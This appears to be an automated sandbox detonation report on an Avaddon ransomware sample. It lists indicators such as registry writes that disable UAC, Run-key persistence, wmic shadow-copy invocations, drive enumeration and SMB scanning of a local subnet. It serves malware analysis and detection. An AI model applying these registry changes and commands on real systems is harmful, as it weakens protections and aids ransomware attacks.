SHA512 47a56042a5d1468ab8fc7609ff67ef23c5639866922953ec7afa391d384f4d28eaa566638f750bf0810747032bb816ed79bd11e5d40db7db06e941fa7cde8846

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1788s

Max time network

1806s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

Signatures

Avaddon

ransomware avaddon

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Renames multiple (158) files with added filename extension

ransomware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-2480455240-981575606-1030659066-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 184.26.45.61:80 x2.c.lencr.org tcp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 61.45.26.184.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
US 8.8.8.8:53 213.80.50.20.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.37:139 tcp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.38:139 tcp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.39:139 tcp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.40:139 tcp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.41:139 tcp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.42:139 tcp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.43:139 tcp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.44:139 tcp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.45:139 tcp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.46:139 tcp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.47:139 tcp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.48:139 tcp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.49:139 tcp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.50:139 tcp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.51:139 tcp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.52:139 tcp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.53:139 tcp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.54:139 tcp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.55:139 tcp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.56:139 tcp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.57:139 tcp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.58:139 tcp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.59:139 tcp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.60:139 tcp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.61:139 tcp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.62:139 tcp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.63:139 tcp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.64:139 tcp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
